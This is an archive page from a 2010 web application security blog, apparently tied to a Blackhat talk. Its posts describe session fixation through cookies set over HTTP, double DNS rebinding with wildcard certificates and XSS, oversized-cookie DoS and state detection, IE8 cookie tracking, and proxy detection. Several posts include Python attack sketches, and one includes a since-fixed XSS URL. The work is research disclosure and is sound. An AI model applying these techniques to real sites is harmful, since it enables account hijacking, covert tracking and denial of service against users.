web application security lab

Archive for the 'Webappsec' Category

MITM, SSL and Session Fixation

Wednesday, September 1st, 2010

23 posts left…

It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space, because cookies don’t follow the same origin policy the way JavaScript does. More importantly, HTTP cookies can overwrite HTTPS cookies, even if those cookies are marked as secure. During our research I started thinking of a form of session fixation that uses this to the attacker’s advantage. Let’s assume the attacker wants access to a user’s account on a site that’s behind SSL/TLS. Now let’s assume the website sets a session cookie prior to authentication, and after authentication the site marks that cookie as valid for whatever username/password combo it receives.

First, the attacker goes to the website before the victim gets there so he can get a session cookie. Then, if the victim is still in HTTP for the same domain the attacker can set a cookie that will replay to the HTTPS website. So the attacker sets the same cookie that he just received into the victim’s browser. Once the victim authenticates, the cookie that the attacker gave the victim (and knows) is now valid for the victim’s account. Now if the victim was already authenticated or had already gotten a session token, no big deal. The attacker overwrites the cookie, which at worst logs the user out. Once the victim re-authenticates, voila - session fixation. Now all the attacker has to do is replay the same cookie in his own browser and he’s in the user’s account.
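The fixation step above can be sketched in a few lines. This is a minimal model, not a working exploit: the site name bank.example, the cookie name session, and the session id are all made up for illustration.

```python
# Sketch of the fixation step, assuming a hypothetical site "bank.example"
# whose pre-auth session cookie is named "session". The attacker first
# fetches his own session id from the site, then injects it into any
# plain-HTTP response for the same domain that he can MitM.

def fixation_header(attacker_session_id: str) -> str:
    """Build the Set-Cookie header the MitM injects into an HTTP response.

    Because cookies don't follow the same origin policy the way
    JavaScript does, this plain-HTTP cookie overwrites the site's
    HTTPS session cookie - even one originally marked "secure".
    """
    return "Set-Cookie: session={}; Domain=.bank.example; Path=/".format(
        attacker_session_id
    )

# The attacker's own (known) session id gets planted in the victim's browser;
# once the victim authenticates, that same id is valid for their account.
injected = fixation_header("d41d8cd98f00b204")
print(injected)
```

The whole trick is that nothing in the injected header distinguishes it from a legitimate cookie as far as the browser's cookie jar is concerned.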

Issues with Perspectives

Wednesday, September 1st, 2010

24 posts left…

When I told one of my guys about the double DNS rebinding attack, he said, “Well it’s a good thing I use Perspectives.” That was my clue that I had better get familiar with the plugin if people are seriously relying on it for security. In the process we found a number of potential issues. For those of you who aren’t clued in, the tool was originally designed to handle situations where governments are tapping people using devices like Packet Forensics boxes, where a certificate from a valid certificate authority is being used to man-in-the-middle an individual or a group.

First of all, it’s easy for a man in the middle to detect Perspectives. Perspectives sends a lot of HTTP traffic, which the attacker can easily read and recognize as Perspectives queries. That may not seem important - if an attacker knows that a user has it installed, what can they really do? We’ll come back to this.

Embedded content is not verified by Perspectives, only the parent window. Because most websites (even HTTPS ones) use third party service providers, caching servers or the like for static content, the attacker can simply MitM the “static” servers serving up CSS, JavaScript or objects that become dynamic content once rendered. By modifying the response and including active content, anything that can be seen by the DOM is still accessible to the man in the middle. Kinda defeats the purpose of Perspectives…

Using the fact that an attacker knows someone is running Perspectives (which they can determine by forcing the user through an SSL/TLS link), the attacker can simply MitM only the embedded content. Of course there are changes a user can make to the settings and options to reduce this risk, but like all options, they’re probably not changed often and the defaults really aren’t good.

Lastly, I tried Perspectives against the double DNS rebinding issue. Unfortunately, because the attack uses a valid cert from a nearby sub-domain that Perspectives has probably seen before, instead of the huge pop-down that would actually alert someone to the problem it only gives the small warning that most people wouldn’t notice unless they were really paying attention.

Prior Knowledge Of User’s Cert Warning Behavior

Wednesday, September 1st, 2010

25 posts left…

One of the issues Josh and I talked about at Blackhat was how the SSL certificate warning message can be used to gain information about a user’s behavior, and how that can be used against the user. Let’s say a man in the middle causes an error by proxying a well-known owner/subsidiary - for example https://www.youtube.com/, which most technical people know belongs to Google and which, incidentally, causes SSL/TLS mismatch errors because it’s mis-configured. Experts who see such an error and investigate will think it’s just a dumb (innocent) error. Non-experts will click through immediately, because they always do when they see such things.

By measuring the wait time the attacker can know which type of user the victim is - a technical one, or a novice. If the user is a novice the attacker knows they don’t have to worry anymore - they can deliver their snake oil cert later if the user goes through it “quickly” because that user’s behavior will most likely stay the same. Of course figuring out the timing might be a bit tricky because really new users will be awfully confused by cert warnings and will seem “slow” I’d bet. Anyway, something to investigate further.

IE Cookies

Friday, August 27th, 2010

26 posts left…

The fact that IE8 doesn’t delete cookies when you tell it to (at least in my testing) until browser shut-down isn’t just bad for usability (and ho boy is it annoying when you’re testing) - it has other interesting privacy implications. Generally I tell people not to set the same cookie more than once, because that makes it harder to use old XMLHttpRequest bugs to download the cookie (which may otherwise be protected using HTTPOnly). But what if the cookie weren’t sensitive, but rather used for tracking?

If a site sets a unique cookie and the user clears cookies in IE8, IE8 keeps sending the cookie anyway (it’s retained in memory) - which means the site still gets it. If the site is trying to track the user, it can simply keep setting the exact same HTTP cookie with an “expires” in the future to make it persist after the browser closes and voila! Even though the user thinks they cleaned their cookies, not for a moment was the cookie removed in IE8. Could be useful for banner advertisers or companies that need to do large-scale tracking of users.
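The server side of that tracking trick is trivial. Here's a sketch of a hypothetical tracker (cookie name uid, id values, and the expiry date are all made up) that re-sets whatever id the browser is still sending:

```python
# Sketch of the tracking trick: on every request the tracker re-sets the
# exact same cookie with a far-future "expires". If the user "clears"
# cookies in IE8 mid-session, the retained in-memory copy still arrives
# on the next request and gets immediately re-persisted to disk.

def tracking_set_cookie(request_cookies: dict, issue_id) -> str:
    """Return the Set-Cookie header to send back for this request.

    request_cookies: cookies the browser sent; issue_id: callable that
    mints a fresh unique id for first-time visitors.
    """
    uid = request_cookies.get("uid") or issue_id()
    return "Set-Cookie: uid={}; expires=Fri, 01-Jan-2038 00:00:00 GMT".format(uid)

# First visit: a fresh id is issued...
first = tracking_set_cookie({}, lambda: "abc123")
# ...later visits just echo whatever id the browser is still sending,
# even if the user believes the cookie was deleted in between.
later = tracking_set_cookie({"uid": "abc123"}, lambda: "NEVER-USED")
print(first == later)
```

The site never needs to know the user "cleared" anything; the in-memory cookie does all the work.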

MitM, DNS Rebinding, SSL/TLS Wildcards and XSS

Sunday, August 22nd, 2010

27 posts left…

This was one of the more complex issues Josh Sokol and I talked about during our presentation at Blackhat. Let’s say there’s an SSL/TLS protected website (addons.mozilla.org) that an attacker knows that the victim is using. The attacker is a MitM but let’s say that addons.mozilla.org has no security flaws in it whatsoever. Let’s also say that there’s another subdomain called mxr.mozilla.org that has the following attributes: It has no important information on it (otherwise the attacker would be content with attacking it instead), it’s vulnerable to XSS, it doesn’t care about host headers and uses a wildcard cert for *.mozilla.org. How can an attacker use that to their advantage?

The victim requests the IP for addons.mozilla.org, and the attacker modifies the DNS response’s TTL to 1 second (and does the same for all subsequent DNS traffic for that domain). The victim logs into addons.mozilla.org (gets a cookie). Login detection can help determine that the user is authenticated; it’s important that the attack not start before this point, otherwise it will fail.

The attacker firewalls off the IP for addons.mozilla.org and forces the user to the XSS URL at:
https://addons.mozilla.org/mozilla-central/ident?i=a%20onmouseover%3Dalert(’XSS’)%20a (notice that the hostname is wrong - it should be mxr.mozilla.org, because that is where the XSS lives). Note that this WAS a real XSS in mxr but it has since been fixed, and to make it work the user would have to mouse over the payload, so you’d have to do some clickjacking or the like - but let’s just pretend that all wasn’t a problem, and/or that there was an easier XSS.

The victim requests the IP for addons.mozilla.org again but this time the attacker responds to the DNS request (with 1 second TTL) with the IP address of mxr.mozilla.org (not addons). The user connects to the mxr.mozilla.org IP address sending the wrong host header - the reason this works is because the wildcard SSL/TLS cert allows for any domain and the mxr.mozilla.org website doesn’t care about host headers. The victim runs the XSS in context of addons.mozilla.org even though they’re on the mxr.mozilla.org IP. That sounds bad (maybe useful for phishing) but there’s worse the attacker can do.

The attacker can give up if addons.mozilla.org doesn’t use HTTPOnly cookies because the attacker can just steal the cookie from JavaScript space. But let’s assume that addons has no flaws in it, including how it sets cookies. In that case the attacker just rebinds again. For lack of a better term we called this “double DNS rebinding.”

The attacker firewalls off the IP for mxr.mozilla.org and un-firewalls the addons.mozilla.org IP. The victim’s browser re-binds and requests DNS for addons.mozilla.org again. The attacker delivers the real IP for addons.mozilla.org. The victim’s cookie is sent to addons.mozilla.org and the JavaScript is now running in the context of addons.mozilla.org. The victim runs a BeEF shell back to the attacker, which allows the attacker to see the contents of the user’s account and interact as if they were the user.
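The attacker's DNS side of the sequence above can be modeled as a tiny state machine. This is a sketch of the logic only (the IP addresses are made up; a real attack would also need the firewalling and the forced XSS navigation), but it shows why the 1-second TTL matters: every phase change takes effect on the very next lookup.

```python
# State-machine sketch of the "double DNS rebinding" sequence.
# ADDONS_IP and MXR_IP stand in for the real addresses of
# addons.mozilla.org and mxr.mozilla.org; both are hypothetical here.

ADDONS_IP = "10.0.0.1"
MXR_IP = "10.0.0.2"

class RebindingResolver:
    """Answers DNS queries for addons.mozilla.org with TTL=1 so the
    browser re-resolves constantly, letting the attacker switch the
    answer between phases of the attack."""

    def __init__(self):
        self.phase = "login"              # phase 1: victim logs in normally

    def resolve(self, qname: str):
        assert qname == "addons.mozilla.org"
        ip = {
            "login": ADDONS_IP,           # let authentication complete
            "xss":   MXR_IP,              # rebind to mxr's IP, fire the XSS
            "steal": ADDONS_IP,           # rebind back: cookie + JS align
        }[self.phase]
        return ip, 1                      # (answer, TTL in seconds)

r = RebindingResolver()
assert r.resolve("addons.mozilla.org") == (ADDONS_IP, 1)
r.phase = "xss"     # attacker firewalls addons' IP, forces the XSS URL
assert r.resolve("addons.mozilla.org") == (MXR_IP, 1)
r.phase = "steal"   # attacker firewalls mxr's IP instead
assert r.resolve("addons.mozilla.org") == (ADDONS_IP, 1)
```

Only in the final phase do the victim's addons.mozilla.org cookie and the attacker's JavaScript end up on the same connection, which is the whole point of rebinding twice.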

We talked with a few people in various places about how likely this is, and although it worked on one of the two sites we checked, we think the likelihood that it will work on a given SSL/TLS enabled site is pretty low. It has to use a wildcard cert, has to have HTTP Response splitting/XSS, has to ignore the host header, etc… We guesstimate that probably 2-4% of SSL/TLS protected sites would be affected, although in reality there’s not a lot of risk here because the attack has a lot of moving parts - there are certainly easier exploits out there. But the interesting part is that this is yet another reason all sub-domains should be considered in scope when something sensitive is sitting behind authentication, beyond just the risk of someone breaking in and stealing the cert outright.

Incidentally when I told the Mozilla guys about this, they said, “Why would we have checked for XSS in mxr? There’s nothing important on there… It’s all public information.” followed by, “Well, it’ll be fun checking for XSS on all our sub domains now.” That’s a good idea anyway for phishing, but checking for host headers is an easier short-cut in the short term. I wouldn’t worry about this attack, because it’s unlikely, but it was interesting coming up with the use case.

Using Cookies For Selective DoS and State Detection

Sunday, August 22nd, 2010

28 posts left…

This is a continuation of the first post, where we described how you can use cookies to DoS certain portions of a website. After our speech one of the Mozilla guys came up to us and described another attack that arises from this. Let’s say that when a user logs in the site sets a cookie that is 200 bytes long, and when they log out it re-sets the same cookie at 50 bytes. If the attacker can set a cookie with a path scoped to a single image on the site, they can use JavaScript with an onerror event handler to check whether that image has loaded.

By combining that with an over-long cookie (sized to the server’s limit minus 50 bytes), a logged-in state will push the request over the limit and cause the image to fail to load, whereas a logged-out state will allow the image to load just fine. In this way an attacker can tell cookie states apart, as long as the cookies are variable width and there aren’t other cookies muddying the waters. Interesting attack, I thought!
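The arithmetic of the length oracle is worth spelling out. A sketch, assuming a hypothetical server that rejects requests whose cookie header exceeds LIMIT bytes (8190 is Apache's default header field limit), the 200/50-byte session cookie sizes from the example, and an attacker-set padding cookie scoped to one image's path:

```python
# Length-oracle math for the cookie state-detection attack.

LIMIT = 8190                  # e.g. Apache's default per-header-field limit
LOGGED_IN, LOGGED_OUT = 200, 50   # session cookie sizes from the example

# Pad so the request only overflows when the long (logged-in) cookie is
# present: any padding in the range (LIMIT - 200, LIMIT - 50] works.
padding = LIMIT - LOGGED_OUT  # i.e. the "over-long cookie minus 50 bytes"

def image_loads(session_cookie_len: int) -> bool:
    """Does the probe image request stay under the server's limit?"""
    return session_cookie_len + padding <= LIMIT

print(image_loads(LOGGED_OUT))  # True  -> image loads, onerror doesn't fire
print(image_loads(LOGGED_IN))   # False -> onerror fires: user is logged in
```

The attacker's page just attaches onerror to the probe image and reports which branch fired.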

Using Cookies For Selective DoS

Sunday, August 22nd, 2010

29 posts left…

One of the things Josh Sokol and I talked about in our presentation at Blackhat was a way to use over-sized cookies to cause a DoS on the site. The web server sees the overlong cookie and stops the request from completing. This is not new and has certainly been discussed before. However, one thing that wasn’t discussed is that using the path an attacker can selectively cause the website to stop displaying portions of the site. For instance, if the attacker wants to shut down /javascript/ or /logout.aspx or /reportabuse.aspx or whatever, they can by setting an overly-long cookie for that particular path.

Setting cookies on the target sub-domain would require something like header injection/response splitting, XSS, or a MitM attack. It should be noted, though, that the exploit doesn’t have to be on the target sub-domain - it can be in another sub-domain, because cookies don’t follow the same origin policy if the cookie is scoped to the parent domain. In this way an attacker could turn off clickjacking prevention code (deframing scripts), or turn off other client-side protections or parts of the site that are bad from an attacker’s perspective. The only real solution to this is for all browsers to cap the maximum size of cookies below the smallest header limit that web servers will allow (Apache’s default limit was smaller than IIS’s, for instance).
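Crafting the selective-DoS cookie is simple once you can set cookies at all. A sketch, assuming a hypothetical server that rejects requests whose cookie header exceeds roughly 8190 bytes (Apache's default field limit) and made-up cookie/domain names:

```python
# Build a path-scoped, parent-domain cookie big enough to make every
# request to that one path fail at the server, while the rest of the
# site keeps working.

def dos_cookie(path: str, domain: str, limit: int = 8190) -> str:
    """Cookie string that overflows the server's header limit, but only
    for requests to `path`. Scoping to the parent domain (.example.com)
    is why an XSS on any sibling sub-domain is enough to plant it."""
    filler = "x" * (limit + 1)        # guarantees the header is too long
    return "junk={}; Domain=.{}; Path={}".format(filler, domain, path)

c = dos_cookie("/logout.aspx", "example.com")
print(len(c) > 8190)
```

Swap the path for /javascript/ or a deframing script's URL and the same cookie silently disables that one resource.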

Detection of Parameter Pollution

Saturday, August 21st, 2010

30 posts left…

There are a lot of web based exploits that can be really tricky to spot if you’re talking about a WAF. Multiple encoding issues, obfuscation and the like… Well, one attack in particular I think is actually pretty easy to detect programmatically (in most cases). In the case of HTTP Parameter Pollution the attacker has to double up on the parameters. So something like: ?a=1&b=2&a=3. If the WAF sees the same parameter (in this case “a”) supplied twice it’s pretty easy to understand that either there was something screwed up or it’s an attack. Either way, it’s worth reporting, and possibly even blocking if you know your site isn’t built like this.

Of course the normal caveats for non-standard parameter delimiters apply (hopefully the WAF could be developed to understand those delimiters in a perfect world). Not to mention the fact that even last week I saw a site that did Parameter Pollution on itself because of shoddy programming (and probably a lot of cutting and pasting by the developer). There could also be cases where some parameters come in on the URL field and others are POST parameters, so that would need to be taken into account as well for systems that don’t care and accept it all as a big pool of parameters. Lastly, I doubt many attackers are actually using Parameter Pollution (yet), but it should be easy enough to catch in most cases.
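For the simple case (standard & delimiters, query-string parameters only), the duplicate check really is a few lines. A minimal WAF-style sketch:

```python
# Flag HTTP Parameter Pollution: report any parameter name that appears
# more than once in the query string.

from collections import Counter
from urllib.parse import parse_qsl

def polluted_params(query: str) -> list:
    """Return the parameter names supplied more than once."""
    counts = Counter(
        name for name, _ in parse_qsl(query, keep_blank_values=True)
    )
    return sorted(name for name, n in counts.items() if n > 1)

print(polluted_params("a=1&b=2&a=3"))  # ['a']  -> report, possibly block
print(polluted_params("a=1&b=2"))      # []     -> clean
```

As noted above, a real deployment would also have to handle non-standard delimiters, sites that legitimately repeat parameters, and duplicates split across the URL and the POST body.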

Quick Proxy Detection

Friday, August 20th, 2010

32 posts left…

Just a quicky post on how in Firefox you can detect proxies using image tags. Firefox (and possibly other browsers, but I first saw it in Firefox) uses [ ] to denote IPv6 addresses (I believe that was its original intention anyway), but the syntax also works with IPv4.

Something as simple as http://[123.123.123.123]/img.jpg?unique_id embedded into a page could be used to see whether the user is behind a proxy, which - at least in the case of Apache’s proxy, as far as I’ve seen - doesn’t understand that syntax and therefore won’t fetch the image. This does give false positives with anything that blocks cross-domain requests, and with robots that try to stay on the same domain. Anyway, this might be helpful to someone.
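Generating the probe is trivial; the only moving part is tying a unique id to each page view so you can check your server logs for the hit. A sketch (the IP and image path are placeholders for a logging host you control):

```python
# Build the bracketed-IPv4 probe <img> tag. A direct Firefox connection
# fetches it; per the observation above, a proxy like Apache's doesn't
# understand the [ ] syntax, so a missing log hit for a given unique id
# suggests that visitor is behind a proxy.

import uuid

def probe_img_tag(ip: str) -> str:
    unique_id = uuid.uuid4().hex   # correlates this page view with a log hit
    return '<img src="http://[{}]/img.jpg?{}">'.format(ip, unique_id)

tag = probe_img_tag("123.123.123.123")
print(tag)
```

Serve the tag, then grep the access log for the id: present means direct connection, absent (for a user who rendered the page) means something in the middle dropped the request.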

Some Possible Insights into Geo-Economics of Security

Wednesday, July 21st, 2010

38 more posts left…

I first started thinking about this when I talked to a friend from Vietnam a year or so ago regarding his CISSP. Once upon a time it was nearly impossible to find someone in Vietnam with a CISSP. At first I thought he was making some sort of joke about the usefulness of the certificate, but for some things in Vietnam it’s really a hot commodity. It turns out that the cost of living there makes a CISSP almost totally not worth it: the certification is expensive even in the United States (where I live), but relative to wages in Vietnam it represents weeks or even a month’s worth of work. Therefore certificates are awarded there at a lower rate - not because of skill, know-how or anything else. It’s purely economics. Slowly that has changed and more people in Vietnam have it now than before, but as a percentage it’s still not equal to the USA, for instance, from what I was told.

That got me thinking about other issues that are relatively similar - for instance SSL/TLS certificates. Buying a certificate to allow for transport security is a good idea if you’re worried about man in the middle attacks. Yes, that’s true even despite what I’m going to tell you in my Blackhat presentation, where Josh Sokol and I will be discussing 24 different issues of varying severity with plugins and browsers in general. But when you’re in a country where the cost of running your website is a significant investment compared to the United States, suddenly the fees associated with the risks are totally lopsided. So this may be why you see a lower adoption rate of certificates in certain regions. More importantly, there really is no long-term reason the security industry can’t create a free certificate authority (over DNSSEC, for instance) that provides all the same security or even more, without the costs - thereby making it a more equal playing field.

Lastly, I started thinking about bug bounties, and how they work almost the opposite way. Unlike defense, where the cost of playing is high, attacking can be much more lucrative depending on your geo-economic situation. For instance, a $3,000 bug bounty for something that takes two weeks to work on equates to a $78k a year job if you can be consistent. In the United States that’s barely worth the time for a skilled researcher. But in a country where the average income is closer to $10k a year, something like this might highly incentivize researchers to focus on attack versus defense, which few can afford. Anyway, I thought it was an interesting concept that may play out entirely differently in reality, but it was a fun thought exercise.